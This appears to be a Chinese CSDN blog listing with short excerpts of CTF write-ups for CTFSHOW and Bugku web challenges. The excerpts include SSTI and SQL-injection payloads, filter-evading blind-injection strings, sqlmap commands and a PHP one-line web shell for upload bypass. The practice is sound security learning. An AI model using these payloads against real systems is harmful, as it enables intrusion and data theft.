![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全
文章平均质量分 50
fallingskies22
这个作者很懒,什么都没留下…
展开
-
[CTFSHOW][WEB入门]SSTI模版注入
web361Flask是一个使用Python编写的轻量级web应用框架,其WSGI工具箱采用Werkzeug,模板引擎则使用Jinja2。参考https://xz.aliyun.com/t/3679#toc-8https://xz.aliyun.com/t/3679#toc-8使用poc进行测试{{5*5}}显然存在模版注入。查找可以利用的类{{"".__class__.__bases__[0].__subclasses__()}}已知<class '...原创 2021-10-14 17:37:39 · 463 阅读 · 1 评论 -
[CTFSHOW][WEB入门] SQL注入
web171参数类型 字符型 SQL语句 SELECT 注入方式 回显注入 查询语句//拼接sql语句查找指定ID用户$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";# 确定回显列数-1' union select NULL,NULL,NULL--+# 查询当...原创 2021-10-07 00:46:42 · 947 阅读 · 0 评论 -
[CTFSHOW][WEB]文件上传
web151根据提示,前端验证,那我们只需要抓包修改就完事儿了。先传一个正常的图片。查看数据包修改数据包,传一个小马。(数据较多时,可以点击开始处,按住shift键,滑动到末尾点击)蚁剑连接找到flag...原创 2021-10-02 02:48:48 · 2524 阅读 · 0 评论 -
Burpsuite2020如何像以前版本一样查看消息编辑器中的hex
更新后确实挺帅的,还有自带的google浏览器这hex选项哪儿去了呢?找了一下更新公告意思是可以在右边多出来的inspector模块编辑hex。找了半天也没找着啊。==看一下说明最后一句告诉我们选择单个字符就可以修改16进制了。试一试在右边更改hex,再点击Apply changes就可以了。...原创 2021-03-20 20:29:35 · 5233 阅读 · 4 评论 -
Bugku-WEB-web38
参考web36https://blog.csdn.net/qq_41209264/article/details/112257878根据提示,布尔盲注。但测试后发现and被过滤,只能使用异或^空格也被过滤逗号被过滤,使用mid((password)from(1)for(1))代替mid((password),1,1)等号被过滤,使用不等号<>for被过滤,使用ascii取字符串第一个字符转换为ascii码构造如下username=admin'^(ascii(mid原创 2021-01-08 19:14:17 · 669 阅读 · 5 评论 -
Bugku-WEB-web37
没有回显的地方,显然是盲注先抓包,再用SQLMAP跑一下python sqlmap.py -r web37.txt --level 5 --batch成功,存在基于时间的盲注第二步,跑数据库名python sqlmap.py -r web37.txt --dbs根据提示python sqlmap.py -r web37.txt --dbs --hex猜测在bugkuctf中第三步,跑出表名python sqlmap.py -r web37.txt -D..原创 2021-01-07 01:54:04 · 1736 阅读 · 2 评论 -
Bugku-WEB-web36
使用御剑扫描目录访问/include看到filter.php,应该是过滤代码,但是看不到 0.0访问/images有图片提示根据提示,字符串在比较时会转化为0构造如下通过判断构造'!=(ascii(mid((passwd)from(1)))=48)-'来获取passwd使用burpsuite intruder再将ascii码转化为字符得到passwd=4dcc88f8f1bc05e7c2ad1a60288481a2.原创 2021-01-06 15:01:01 · 835 阅读 · 0 评论 -
Bugku-WEB-web35
一个普通的登陆界面,和提示写的一样,点击Login没有反应F12查看源代码在head中发现一个链接admin.css访问http://114.67.246.176:19005/admin.css 下载下来admin.css文件打开文件发现提示用GET方法上传6419参数根据代码,让cookie值等于$KEY的序列化的值就能显示flag编写php代码,在线运行https://c.runoob.com/compile/1用火狐的hackbar上传cookie值..原创 2021-01-06 03:04:24 · 606 阅读 · 0 评论 -
Bugku-WEB-web34
进入题目,观察URL,显然存在文件包含。参考文件包含漏洞https://www.jianshu.com/p/3514f0fd79f7考虑使用php伪协议读取源码php://filter/read=convert.base64-encode/resource=需要读取的文件代码内容应该是被过滤了,==F12查看源码提示有一个upload.php页面是一个文件上传页面,加上存在文件包含,考虑使用图片马。随便找一张图片,用记事本打开,写入一句话上传成功后访问图片..原创 2021-01-06 02:30:39 · 242 阅读 · 0 评论 -
Bugku-WEB-web33
<?phpfunction encrypt($data,$key){ $key = md5('ISCC'); #729623334f0aa2784a1599fd374c120d $x = 0; $len = strlen($data); $klen = strlen($key); for ($i=0; $i < $len; $i++) { if ($x == $klen) { $x = 0;.原创 2021-01-05 23:54:42 · 279 阅读 · 0 评论 -
Bugku-WEB-web32
根据提示为文件上传写一个shell.php<?php @eval($_POST[cmd]);?>上传,抓包显示invalid file一共三个过滤请求头部的 Content-Type 文件后缀 请求数据的Content-Type请求头部的Content-Type采用大小写绕过php语言除了可以解析以php为后缀的文件,还可以解析php2,php3、php4、php5这些后缀的文件,请求数据的Content-Type改成 image/jpeg小提示..原创 2021-01-01 14:43:39 · 233 阅读 · 1 评论 -
Bugku-WEB-web31
一上来就是个404,用御剑跑一下,看有什么可以访问的页面。访问robots.txt发现resusl.php访问根据提示原创 2021-01-01 13:43:29 · 185 阅读 · 1 评论 -
Bugku-WEB-web29
参考php弱类型https://www.runoob.com/php/php-types-comparisons.html分析代码使用了sha1函数sha1函数存在漏洞,当传入的是数组时,会报错,返回为NULL,当传入的两个参数都是数组直接相等。构造 GET: ?uname[]=1&id=marginPOST: passwd[]=2使用hackbar得到flag...原创 2020-12-31 14:25:49 · 279 阅读 · 0 评论 -
BugKu-WEB-web21
打开网页如下熟悉的?id=看起来好像有sql注入,用sqlmap跑一遍发现并没有F12查看一下源代码有注释!,1p.html.查看一下这个网址。竟然跳转到论坛了 ==查看网络发现301重定向。那要看1p.html,就只能用burpsuite抓包了。...原创 2020-12-31 10:09:27 · 653 阅读 · 4 评论 -
Bugku-WEB-web27
提示输入a尝试用get方法上传a显示错误但是这题没有提供源码 ==根据网上的writeup,源码应该如下<?php$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}";} else { ..原创 2020-12-31 08:52:15 · 140 阅读 · 0 评论 -
Bugku-WEB-web28
根据提示,利用x-forwarded-for修改代理iphttps://www.runoob.com/w3cnote/http-x-forwarded-for.html x-forwarded-for详解原创 2020-12-31 08:51:43 · 177 阅读 · 0 评论 -
Bugku-WEB-web30
阅读代码,大意是要上传ac和fn两个参数,使得fn文件内的值等于ac的值。利用php伪协议php://input原创 2020-12-31 08:50:57 · 117 阅读 · 0 评论 -
Bugku-WEB-web23
这题主要考察正则表达式参考https://www.runoob.com/regexp/regexp-syntax.htmlhttps://www.jb51.net/article/28257.htm表达式的结尾处的不区分大小写 i 标记指定不区分大小写。. 匹配除换行符 \n 之外的任何单字符。要匹配 . ,请使用 \. 。 * 匹配前面的子表达式零次或多次。要匹配 * 字符,请使用 \*。 {n,m} m 和 n 均为非负整数,其中n <..原创 2020-12-31 08:50:02 · 100 阅读 · 0 评论 -
Bugku-WEB-web24
先f12看一下源码发现有一个链接,指向code.txtv1和v2利用之前md5碰撞的那道题的方法绕过。strcmp用法参考https://www.w3school.com.cn/php/func_string_strcmp.asp但strcmp无法比较数组,会返回0.构造 v1=QNKCDZO&v2=s878926199a&v3[]=1...原创 2020-12-31 08:49:11 · 338 阅读 · 0 评论 -
渗透测试——bluecms安装及seay代码审计
安装phpstudy链接:https://pan.baidu.com/s/1A8QrOJ-I1UHR08l4KbqpUw提取码:e8a3按照默认安装即可安装bluecms将src_new文件放到WWW中。设置允许目录列表访问http://localhost/src_new/src_new/uploads/install/按照默认安装随便填写数据库配置与管理员帐号能够访问页面http://localhost/src_new/src_new/uploads/说.原创 2020-06-15 23:07:38 · 3469 阅读 · 0 评论